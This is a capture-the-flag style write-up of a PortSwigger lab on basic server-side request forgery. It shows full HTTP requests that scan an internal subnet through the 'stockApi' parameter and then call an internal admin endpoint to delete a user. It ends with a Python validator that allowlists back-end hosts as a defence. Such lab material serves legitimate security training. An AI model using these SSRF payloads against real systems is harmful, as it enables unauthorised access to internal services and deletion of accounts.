
Basic SSRF against another back-end system

Solution

Open the website: https://0a5d002d04cecaa980026cb8007000a8.web-security-academy.net/product?productId=1

Find the admin panel with Burp Intruder by brute-forcing the last octet of the internal IP in the stockApi parameter:

Admin panel on: 192.168.0.72
---
POST /product/stock HTTP/2
Host: 0a0300150321d7aa806b53f5004a0023.web-security-academy.net
Cookie: session=u45C63n9bAeEccDk3uJDeHa5d1oY7zvx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0300150321d7aa806b53f5004a0023.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: https://0a0300150321d7aa806b53f5004a0023.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive

stockApi=http://192.168.0.$1$:8080/admin
---
POST /product/stock HTTP/2
Host: 0a0300150321d7aa806b53f5004a0023.web-security-academy.net
Cookie: session=u45C63n9bAeEccDk3uJDeHa5d1oY7zvx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0300150321d7aa806b53f5004a0023.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: https://0a0300150321d7aa806b53f5004a0023.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive

stockApi=http://192.168.0.9:8080/admin

Delete the user carlos by pointing stockApi at: http://192.168.0.9:8080/admin/delete?username=carlos

POST /product/stock HTTP/2
Host: 0a0300150321d7aa806b53f5004a0023.web-security-academy.net
Cookie: session=u45C63n9bAeEccDk3uJDeHa5d1oY7zvx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0300150321d7aa806b53f5004a0023.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: https://0a0300150321d7aa806b53f5004a0023.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

stockApi=http://192.168.0.9:8080/admin/delete?username=carlos

Solved
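The root cause above is that /product/stock forwards whatever URL arrives in stockApi, so an attacker can steer the server at any host it can reach. As an added example (not PortSwigger's code), here is a validator for that parameter: it only accepts an allowlisted back-end host:port and path prefix, and as defence in depth checks that the name still resolves into the expected back-end subnet. The host name, port, path prefix and subnet are assumptions constructed for the example.

```python
"""Hardened check for an SSRF-prone 'stockApi=<url>' parameter (constructed example)."""
import ipaddress
import socket
from urllib.parse import urlsplit

# Assumed back-end stock service and the subnet it is expected to live in.
ALLOWED_BACKENDS = {("stock.example-shop.internal", 8080)}
ALLOWED_PATH_PREFIX = "/product/stock/"
BACKEND_NETWORK = ipaddress.ip_network("10.20.0.0/24")


def default_resolver(host):
    """Return the set of addresses the host currently resolves to."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def validate_stock_api_url(url, resolver=default_resolver):
    """Return (ok, reason); only ok=True URLs may be fetched server-side."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username or parts.password:
        return False, "credentials in URL not allowed"
    try:
        host, port = parts.hostname, parts.port  # .port raises on a bad port
    except ValueError:
        return False, "malformed port"
    if host is None:
        return False, "missing host"
    port = port or (443 if parts.scheme == "https" else 80)
    # An IP literal such as 192.168.0.9 never matches an allowlisted name.
    if (host, port) not in ALLOWED_BACKENDS:
        return False, f"{host}:{port} is not an allowlisted back end"
    # Even on the right host, do not let the caller pick arbitrary endpoints.
    if not parts.path.startswith(ALLOWED_PATH_PREFIX):
        return False, f"path {parts.path!r} is outside {ALLOWED_PATH_PREFIX!r}"
    # Catch an allowlisted name that has been re-pointed inward (DNS change or rebinding).
    for addr in resolver(host):
        if ipaddress.ip_address(addr) not in BACKEND_NETWORK:
            return False, f"{host} resolves to {addr}, outside {BACKEND_NETWORK}"
    return True, "ok"
```

The safer design is for the endpoint to take only a productId and build the back-end URL itself, and whichever design is used, the request should be sent to the address that was validated rather than re-resolving the name.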